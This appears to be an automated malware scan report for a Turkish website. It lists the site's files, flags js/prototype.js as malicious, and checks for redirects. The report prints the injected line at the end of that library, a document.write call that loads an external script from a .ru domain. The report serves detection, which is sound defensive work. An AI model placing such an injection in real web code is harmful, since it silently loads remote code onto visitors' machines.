Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sadribeyinevi.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sadribeyinevi.com/ | 200 OK Content-Length: 6183 Content-Type: text/html | clean |
http://sadribeyinevi.com/slideshow.js | 200 OK Content-Length: 19661 Content-Type: application/x-javascript | clean |
http://sadribeyinevi.com/index.html | 200 OK Content-Length: 6183 Content-Type: text/html | clean |
http://sadribeyinevi.com/hakkimizda.html | 200 OK Content-Length: 4736 Content-Type: text/html | clean |
http://sadribeyinevi.com/ozellikler.html | 200 OK Content-Length: 4516 Content-Type: text/html | clean |
http://sadribeyinevi.com/zeyrekten.html | 200 OK Content-Length: 7897 Content-Type: text/html | clean |
http://sadribeyinevi.com/js/prototype.js | 200 OK Content-Length: 126238 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[4006 bytes skipped]... sNameToAdd).join(' ')); }, remove: function(classNameToRemove) { if (!this.include(classNameToRemove)) return; this.set($A(this).without(classNameToRemove).join(' ')); }, toString: function() { return $A(this).join(' '); } }; Object.extend(Element.ClassNames.prototype, Enumerable); Element.addMethods(); document.write('<sc'+'ript type="text/javascript" src="http://starvingarctic.ru/IMAP.js"></scri'+'pt>'); Antivirus reports:
| ||
http://sadribeyinevi.com/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 2654 Content-Type: application/x-javascript | clean |
http://sadribeyinevi.com/js/lightbox.js | 200 OK Content-Length: 18393 Content-Type: application/x-javascript | clean |
http://sadribeyinevi.com/zeyrek.html | 200 OK Content-Length: 5807 Content-Type: text/html | clean |
http://sadribeyinevi.com/iletisim.html | 200 OK Content-Length: 3113 Content-Type: text/html | clean |
http://sadribeyinevi.com/images/kroki.jpg | 200 OK Content-Length: 302312 Content-Type: image/jpeg | clean |
http://sadribeyinevi.com/test404page.js | 404 Not Found Content-Length: 208 Content-Type: text/html | clean |
http://sadribeyinevi.com/images/zeyrekten_big/1.jpg | 200 OK Content-Length: 300889 Content-Type: image/jpeg | clean |
http://sadribeyinevi.com/images/zeyrekten_big/2.jpg | 200 OK Content-Length: 264930 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sadribeyinevi.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:23:03 GMT
Accept-Ranges: bytes
ETag: "177e80d-1827-4b8c9875"
Server: Apache/1.3.33 (Unix) FrontPage/5.0.2.2635 mod_deflate/1.0.21
Content-Length: 6183
Content-Type: text/html
Last-Modified: Tue, 02 Mar 2010 04:47:49 GMT
...6183 bytes of data.
GET / HTTP/1.1
Host: sadribeyinevi.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 19:23:03 GMT
Accept-Ranges: bytes
ETag: "177e80d-1827-4b8c9875"
Server: Apache/1.3.33 (Unix) FrontPage/5.0.2.2635 mod_deflate/1.0.21
Content-Length: 6183
Content-Type: text/html
Last-Modified: Tue, 02 Mar 2010 04:47:49 GMT
...6183 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sadribeyinevi.com
Referer: http://www.google.com/search?q=sadribeyinevi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sadribeyinevi.com
Referer: http://www.google.com/search?q=sadribeyinevi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.